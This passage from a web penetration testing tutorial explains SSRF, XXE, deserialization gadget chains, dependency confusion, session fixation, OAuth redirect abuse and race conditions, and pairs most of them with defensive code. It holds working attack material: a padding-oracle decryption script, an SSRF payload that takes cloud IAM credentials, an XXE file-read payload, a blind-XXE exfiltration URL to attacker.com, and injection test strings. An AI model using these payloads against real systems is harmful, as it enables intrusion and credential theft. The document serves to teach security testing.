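                    continue
            intermediate[pos] = guess ^ pad
            break
    return xor(intermediate, prev)


def recover_plaintext(iv, ciphertext, oracle):
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    padded = b"".join(
        recover_block(blocks[i - 1], blocks[i], oracle) for i in range(1, len(blocks))
    )
    return padded[:-padded[-1]]  # strip the PKCS#7 padding


iv = os.urandom(BLOCK)
ciphertext = cbc_encrypt(b"session=admin; secret=42", iv)
print(recover_plaintext(iv, ciphertext, padding_oracle))
```

Each byte costs at most 256 oracle queries, so a 16-byte block falls in a few thousand requests regardless of the key size.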

4.4 Server-Side Request Forgery (SSRF)

SSRF is a vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. It represents a violation of the "Trust Boundary".46

4.4.1 Mechanics and Cloud Implications

Modern web applications often run in cloud environments (AWS, GCP, Azure) or microservice architectures. In these environments, the server often has access to internal, non-public networks or loopback interfaces that are trusted implicitly.

  • The Target: AWS Instance Metadata Service (IMDS): A specific, high-value target in AWS environments is the link-local address 169.254.169.254. This IP is non-routable over the internet and is accessible only from within the EC2 instance.46

  • Exploitation:

    1. Identification: Find a feature that fetches URLs (e.g., "Import Profile from URL," "Webhooks," or "PDF Generators").

    2. Payload: Input http://169.254.169.254/latest/meta-data/iam/security-credentials/.

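    3. Impact: The server fetches this URL. Because the request originates from the instance itself, the metadata service answers it (this holds for IMDSv1, which requires no session token). The response lists the IAM role attached to the instance; requesting the same path with that role name appended returns the temporary AWS Access Key, Secret Key, and session token assigned to that instance.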

    4. Consequence: The attacker can extract these keys and use the AWS CLI to authenticate as the server, potentially gaining control over S3 buckets, databases, or the entire cloud infrastructure.48
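From the defender's side, the trust boundary can be partially enforced by refusing URLs that point at internal address ranges. The sketch below covers only IP literals; the function name is an assumption, and a real control would also need to resolve hostnames, re-check after redirects, and handle alternative address encodings.

```python
import ipaddress
from urllib.parse import urlsplit


def targets_internal_ip(url):
    """Return True if the URL's host is an IP literal in an internal range."""
    host = urlsplit(url).hostname
    if host is None:
        return True  # no parseable host: refuse by default
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # A hostname, not an IP literal. This sketch does not resolve it;
        # a production check must resolve it and test every returned address.
        return False
    return addr.is_link_local or addr.is_loopback or addr.is_private


print(targets_internal_ip("http://169.254.169.254/latest/meta-data/iam/security-credentials/"))
print(targets_internal_ip("https://example.com/webhook"))
```

The metadata address is rejected because `169.254.0.0/16` is link-local; the second URL passes only because this sketch does not look up hostnames.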

4.5 Security Misconfiguration: XML External Entities (XXE)

XXE is a vulnerability in XML parsers that arises from the processing of external data references defined in the document structure.

4.5.1 Root Cause: DTDs and the SYSTEM Directive

The XML standard includes Document Type Definitions (DTDs), which define the structure of an XML document. DTDs allow the definition of "Entities"—variables that can be used throughout the document. Crucially, the SYSTEM keyword allows these entities to be defined by pulling data from external URIs, which can be file paths (file://) or URLs (http://).50

4.5.2 Exploitation Mechanics

  • Scenario: An application accepts XML input (e.g., a SOAP endpoint or a file uploader that parses SVG images).

  • Payload Construction:

    <?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "file:///etc/passwd">
    ]>
    <foo>&xxe;</foo>

  • Execution: When the XML parser processes the &xxe; reference, it obeys the SYSTEM directive. It reads the local /etc/passwd file from the server's filesystem and substitutes the entity with the file's content. If the application reflects the content of <foo> back to the user, the password file is disclosed.51

  • Blind XXE: If the application processes the XML but does not display the output, the attacker relies on Out-of-Band (OOB) exfiltration. The malicious entity is defined to make an HTTP request to an attacker-controlled server (e.g., http://attacker.com/?data=), appending the file content as a URL parameter. The attacker then monitors their server logs to retrieve the data.52
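One common countermeasure is to refuse any document that declares entities at all. The sketch below does this with the standard library's `xml.parsers.expat` by raising from the entity-declaration callback; the exception class and function name are illustrative, and the payload is the classic file-disclosure example.

```python
import xml.parsers.expat


class ForbiddenXML(ValueError):
    """Raised when a document uses a construct this parser refuses to process."""


def parse_rejecting_entities(document):
    """Return the document's text content, refusing any entity declaration."""
    parser = xml.parsers.expat.ParserCreate()

    def on_entity_decl(name, is_parameter_entity, value, base,
                       system_id, public_id, notation_name):
        # Fires while the DTD is being read, before any entity is expanded.
        raise ForbiddenXML(f"entity declaration not allowed: {name}")

    text = []
    parser.EntityDeclHandler = on_entity_decl
    parser.CharacterDataHandler = text.append
    parser.Parse(document, True)
    return "".join(text)


XXE_PAYLOAD = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>"""

print(parse_rejecting_entities(b"<foo>hello</foo>"))
try:
    parse_rejecting_entities(XXE_PAYLOAD)
except ForbiddenXML as err:
    print("rejected:", err)
```

Rejecting the declaration means the SYSTEM identifier is never dereferenced, so neither the in-band nor the out-of-band variant has anything to work with.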

4.6 Insecure Deserialization (A08:2025)

Insecure Deserialization is a complex class of vulnerability that involves the restoration of programming objects from a byte stream or structured text format.

4.6.1 The Mechanics of Serialization

Serialization is the process of converting an object's state (its data/attributes, together with type information identifying its class) into a format that can be stored or transmitted (like a JSON string or a binary stream). Deserialization is the reverse process. Vulnerabilities occur when the deserialization engine treats the incoming byte stream as trusted, effectively instantiating objects of attacker-chosen types populated with attacker-chosen data.53

4.6.2 Gadget Chains

  • Concept: An attacker generally cannot just inject a malicious script directly into the stream. Instead, they must reuse existing code available in the application's classpath. This technique is known as building a "Gadget Chain."

  • Mechanism:

    1. Entry Point: The attacker finds a class with a "magic method" that executes automatically upon deserialization (e.g., __wakeup() in PHP, readObject() in Java, or __reduce__ in Python).

    2. The Chain: The attacker manipulates the data members of this class so that its magic method calls a method in another class, which calls another, and so on.

    3. The Sink: The chain eventually reaches a method that performs a dangerous action, such as executing a system command (Runtime.exec()) or writing a file.

  • Exploitation: Tools like ysoserial are used to generate these payloads. The tool ships with a collection of known gadget chains for common libraries (like Apache Commons Collections). The pentester generates a payload using ysoserial, sends it to the vulnerable endpoint, and the server deserializes it, triggering the chain reaction that leads to Remote Code Execution (RCE).54
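The "magic method" entry point is easy to observe in Python's `pickle`, where `__reduce__` tells the deserializer which callable to invoke. The sketch below uses a harmless arithmetic expression as the sink; the class name `Gadget` is illustrative.

```python
import pickle


class Gadget:
    def __reduce__(self):
        # Instructs pickle: "to rebuild this object, call eval('6 * 7')".
        # A real payload would name a dangerous callable instead.
        return (eval, ("6 * 7",))


payload = pickle.dumps(Gadget())   # bytes an attacker would send
result = pickle.loads(payload)     # eval runs here, during deserialization
print(result)  # 42
```

The receiving side never needs the `Gadget` class: the byte stream only references a callable that already exists on the server, which is the essence of reusing code that is already present.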

4.7 Software Supply Chain Failures (A03:2025)

This category represents a shift in focus from the vulnerabilities in the application code itself to the vulnerabilities in the dependencies and pipelines used to build and deploy it.4

4.7.1 CI/CD Integrity and Dependency Confusion

  • The Attack Vector: Compromising the build pipeline. If an attacker can inject malicious code into a Continuous Integration/Continuous Deployment (CI/CD) pipeline (e.g., GitHub Actions, Jenkins), the malware is integrated into the application before it is signed and deployed.

  • Dependency Confusion: This is a specific technique where an attacker identifies the name of an internal, private software package used by a company (e.g., company-auth-lib). The attacker then publishes a malicious package with the same name but a higher version number to a public repository like npm or PyPI. When the automated build system runs, it defaults to pulling the latest version. Since the public version is higher, the build system pulls the malware from the public repository instead of the legitimate internal package, compromising the build.57
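The resolution logic that Dependency Confusion abuses can be modeled in a few lines. This is a simplified sketch, not the behavior of any specific package manager; the index contents, version numbers, and function names are invented.

```python
def parse_version(text):
    """Turn "1.3.0" into (1, 3, 0) so versions compare numerically."""
    return tuple(int(part) for part in text.split("."))


def resolve_naive(name, indexes):
    """Pick the highest version found on any index, public or private."""
    candidates = [
        (parse_version(version), source)
        for source, packages in indexes.items()
        for version in packages.get(name, [])
    ]
    return max(candidates)


def resolve_pinned(name, indexes, internal_names):
    """Internal package names are only ever looked up on the internal index."""
    if name in internal_names:
        indexes = {"internal": indexes["internal"]}
    return resolve_naive(name, indexes)


INDEXES = {
    "internal": {"company-auth-lib": ["1.2.0", "1.3.0"]},
    "public": {"company-auth-lib": ["99.0.0"]},  # published by the attacker
}

print(resolve_naive("company-auth-lib", INDEXES))
print(resolve_pinned("company-auth-lib", INDEXES, {"company-auth-lib"}))
```

The naive resolver selects version 99.0.0 from the public index; pinning the name to the internal index returns 1.3.0.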

4.8 Identification and Authentication Failures (A07:2025)

This category covers weaknesses in confirming the user's identity and in maintaining that identity across a session.4

4.8.1 Session Fixation

  • Mechanism: In a Session Fixation attack, the attacker obtains a valid session ID (often by simply visiting the login page themselves). They then trick the victim into using this specific ID, perhaps by sending a link like http://site.com/login?PHPSESSID=attacker_known_id.

  • The Flaw: Vulnerable applications accept the session ID provided in the URL or cookie and establish the session before authentication. When the victim enters their credentials, the server authenticates the session but fails to issue a new ID. The attacker, who already knows the ID, now possesses an authenticated session without ever needing the victim's password.11
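
The difference between the vulnerable and the corrected login flow can be sketched with an in-memory session store. This is a minimal illustration under stated assumptions: the SessionStore class and its method names are hypothetical and do not correspond to any particular framework's API.

```python
import secrets

class SessionStore:
    """Hypothetical in-memory session store for illustration only."""

    def __init__(self):
        self._sessions = {}

    def open(self, session_id=None):
        """Return a session ID, creating the session if needed.
        Accepting a caller-supplied ID is what makes fixation possible."""
        if session_id is None:
            session_id = secrets.token_urlsafe(32)
        self._sessions.setdefault(session_id, {"user": None})
        return session_id

    def login_vulnerable(self, session_id, user):
        """Authenticate the existing session and keep the same ID."""
        self._sessions[session_id]["user"] = user
        return session_id

    def login_safe(self, session_id, user):
        """Discard the pre-login session and issue a fresh random ID."""
        self._sessions.pop(session_id, None)
        new_id = secrets.token_urlsafe(32)
        self._sessions[new_id] = {"user": user}
        return new_id

    def user_for(self, session_id):
        return self._sessions.get(session_id, {}).get("user")

# Vulnerable flow: the victim logs in on the attacker's chosen ID.
store = SessionStore()
fixed_id = store.open("attacker_known_id")
store.login_vulnerable(fixed_id, "victim")
hijacked = store.user_for("attacker_known_id")

# Safe flow: the ID is rotated at login, so the known ID is worthless.
store2 = SessionStore()
fixed_id2 = store2.open("attacker_known_id")
fresh_id = store2.login_safe(fixed_id2, "victim")
blocked = store2.user_for("attacker_known_id")
```

In the vulnerable flow the attacker's known ID resolves to the victim's account. In the safe flow it resolves to nothing, because the authenticated state lives only under the freshly issued ID.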

4.8.2 OAuth 2.0 Flaws

  • Redirect URI Manipulation: In an OAuth flow, the user authenticates with a provider (e.g., Google) and is redirected back to the application with an authorization code. The application sends a redirect_uri parameter to tell the provider where to send the user.

  • Exploitation: If the provider does not strictly validate this redirect_uri against an exact-match allowlist of URIs registered for the application, an attacker can craft an authorization link whose redirect_uri points to their own server (e.g., attacker.com) and send it to the victim. When the victim authenticates, the provider redirects them, along with the sensitive authorization code, to the attacker's server. The attacker captures the code and exchanges it for an access token, gaining control of the user's account.59
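
The validation step can be sketched as an exact-match comparison against pre-registered URIs. This is a minimal illustration: the client ID, the registered URI, and both function names are hypothetical, and the prefix-based check is included only to show a common flawed pattern.

```python
# Hypothetical registration data held by the authorization server.
REGISTERED_REDIRECT_URIS = {
    "example-client": {"https://app.example.com/oauth/callback"},
}

def is_redirect_allowed(client_id, redirect_uri):
    """Exact string comparison against the client's registered URIs."""
    return redirect_uri in REGISTERED_REDIRECT_URIS.get(client_id, set())

def is_redirect_allowed_naive(redirect_uri):
    """Flawed check: prefix matching accepts look-alike hosts."""
    return redirect_uri.startswith("https://app.example.com")

legit = "https://app.example.com/oauth/callback"
evil = "https://app.example.com.attacker.com/cb"

print(is_redirect_allowed("example-client", legit))  # True
print(is_redirect_allowed("example-client", evil))   # False
print(is_redirect_allowed_naive(evil))               # True: the bypass
```

The look-alike host passes the prefix check because the string comparison stops before the real domain boundary, which is why exact matching is the safer default.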

4.9 Security Logging and Monitoring Failures (A09:2025)

This category is unique as it addresses the organization's ability to detect an attack in progress.61

4.9.1 Active Reconnaissance as a Metric

  • The Pentester's Role: During a pentest, the researcher performs "Active Reconnaissance." This involves aggressive actions like port scanning with nmap or directory brute-forcing with gobuster or dirb.62

  • The Failure: These activities generate massive amounts of network noise—thousands of 404 errors, rapid connection resets, and anomalous traffic patterns. If the organization's Security Operations Center (SOC) fails to alert on or block the pentester's IP address during this noisy phase, it constitutes a failure of Security Logging and Monitoring. The ability to attack a system for days without detection is a critical finding in any report.63
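
The kind of detection that should fire during directory brute-forcing can be sketched as a sliding-window count of 404 responses per client. This is a minimal illustration: the find_noisy_clients function, the threshold of 50 errors in 60 seconds, and the sample IP addresses are assumptions, not values from any specific SOC tooling.

```python
from collections import defaultdict, deque

def find_noisy_clients(events, threshold=50, window_seconds=60):
    """Flag IPs with at least `threshold` 404s inside a trailing window.

    `events` is an iterable of (timestamp_seconds, client_ip, status_code)
    tuples, assumed to be sorted by timestamp.
    """
    recent = defaultdict(deque)  # client_ip -> timestamps of recent 404s
    flagged = set()
    for timestamp, ip, status in events:
        if status != 404:
            continue
        hits = recent[ip]
        hits.append(timestamp)
        # Drop 404s that have fallen out of the trailing window.
        while hits and timestamp - hits[0] > window_seconds:
            hits.popleft()
        if len(hits) >= threshold:
            flagged.add(ip)
    return flagged

# Hypothetical log: one scanner hammering paths, one ordinary visitor.
events = [(i * 0.1, "203.0.113.7", 404) for i in range(100)]
events += [(5.0, "198.51.100.20", 200), (30.0, "198.51.100.20", 404)]
events.sort()

flagged = find_noisy_clients(events)
print(flagged)
```

A single stray 404 from an ordinary visitor stays well under the threshold, while the brute-force pattern crosses it within seconds.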

4.10 Race Conditions and Logic Flaws

Race conditions exploit the timing gap between the checking of a condition and the execution of an action (Time-of-Check to Time-of-Use, or TOCTOU).

4.10.1 Limit Overrun

  • Scenario: An e-commerce site allows a discount code to be used "only once per account."

  • Mechanism: The application logic flows as follows:

    1. Check: "Has this user used the coupon?" (Read Database)

    2. If No: Apply Discount.

    3. Action: "Mark coupon as used." (Write Database)

  • The Exploit: An attacker uses a tool like Burp Suite's "Turbo Intruder" to send 20 requests for the coupon simultaneously (often using HTTP/2 Single Packet Attack techniques).

  • The Race: All 20 requests arrive and are processed by parallel threads. They all execute Step 1 (Check) before any of them reach Step 3 (Write). Since the database hasn't been updated yet, all 20 threads see the coupon as "unused," and the discount is applied 20 times. This vulnerability bypasses the intended business logic purely through the manipulation of time and concurrency.64
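
The check-then-act gap can be reproduced with threads. This is a minimal sketch under stated assumptions: the redeem_all function is hypothetical, an in-memory flag stands in for the database row, and a barrier is used artificially to hold every thread between the check and the write so the race is deterministic. In a real application the fix would normally live in the database (for example an atomic update or a uniqueness constraint), which the lock here only approximates.

```python
import threading

def redeem_all(n_requests, atomic):
    """Simulate n parallel coupon redemptions; return discounts applied."""
    used = {"flag": False}   # stands in for the "coupon used" database row
    applied = []             # one entry per discount actually granted
    lock = threading.Lock()
    barrier = threading.Barrier(n_requests)

    def vulnerable():
        seen_unused = not used["flag"]   # Step 1: check
        barrier.wait()                   # every thread checks before any writes
        if seen_unused:
            applied.append(1)            # Step 2: apply discount
            used["flag"] = True          # Step 3: mark as used (too late)

    def safe():
        barrier.wait()                   # still arrive simultaneously
        with lock:                       # check and write as one atomic unit
            if not used["flag"]:
                used["flag"] = True
                applied.append(1)

    target = safe if atomic else vulnerable
    threads = [threading.Thread(target=target) for _ in range(n_requests)]
    for thread in threads:
        thread.start()
    for thread in threads:
        thread.join()
    return len(applied)

vulnerable_count = redeem_all(20, atomic=False)
safe_count = redeem_all(20, atomic=True)
print(vulnerable_count, safe_count)
```

With the check and the write separated, all 20 requests see the coupon as unused. Once they are performed as a single atomic step, only one request succeeds.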

5. Conclusion

Web penetration testing, when approached from first principles, reveals that vulnerabilities are rarely random accidents. They are the logical, deterministic consequences of architectural decisions, protocol behaviors, and the complexity of state management.

SQL Injection is not just a coding error; it is a failure of the interpreter to maintain the boundary between control plane and data plane. XSS is not just a script injection; it is a subversion of the browser's trust model (SOP). SSRF is a violation of network trust boundaries in cloud architectures.

By mastering the underlying protocols (HTTP/TCP), the execution environments (Browsers, Parsers, Shells), and the manual tools that manipulate them (curl, netcat, Python), a security practitioner moves beyond the limitations of automated scanners. They gain the ability to identify subtle logic flaws, chain complex vulnerabilities, and understand the true security posture of a web application. The transition from using a tool like Burp Suite as a "magic button" to using it as a surgical instrument for protocol manipulation marks the evolution from novice to expert.

Vulnerability Mechanics Summary

| Vulnerability | Mechanism (Root Cause) | Primary Manual Test |
| --- | --- | --- |
| SQL Injection | Breaking the Abstract Syntax Tree (AST) via delimiter injection. | curl... ' OR 1=1 -- |
| XSS (DOM) | Data flow from untrusted Source to execution Sink without sanitization. | Inspect location.search -> document.write |
| SSRF | Server trusting input to fetch internal resources (Trust Boundary violation). | curl... url=http://169.254.169.254 |
| IDOR | Failure of stateful Authorization checks on direct object references. | Change ID in URL, compare HTTP 200 vs 403 |
| XXE | Abuse of DTD SYSTEM directive for external entity expansion. | Inject <!ENTITY xxe SYSTEM "file:///"> |
| Command Injection | Shell metacharacter interpretation chaining commands. | Inject ; id or ` |
| JWT None Algo | Logical flaw in signature verification algorithm trust. | Modify header alg: none, strip signature |
| Race Condition | Time-of-Check to Time-of-Use (TOCTOU) gap in concurrent processing. | Send parallel requests (Turbo Intruder) |